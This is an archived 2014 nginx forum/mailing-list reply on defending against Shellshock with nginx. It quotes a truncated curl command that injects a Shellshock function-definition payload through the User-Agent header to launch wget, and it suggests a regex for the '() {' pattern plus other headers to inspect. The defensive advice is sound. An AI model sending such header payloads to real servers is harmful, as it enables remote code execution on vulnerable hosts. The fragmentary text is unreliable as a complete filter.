Shellshock protection using nginx ?

mex nginx-forum at
Fri Sep 26 09:23:04 UTC 2014

curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O


if, you should try to match for (regex-pattern) "\(\) {" 
#since this must be written like this;
an additional space between "()      {" would render the exploiut

further more: you are missing all headers; attacks i've seen so far worked
- UA
- cookies
- custom headers

customized attacks might work via POST-BODY too, but this is yet not

Posted at Nginx Forum:,253553,253557#msg-253557

More information about the nginx mailing list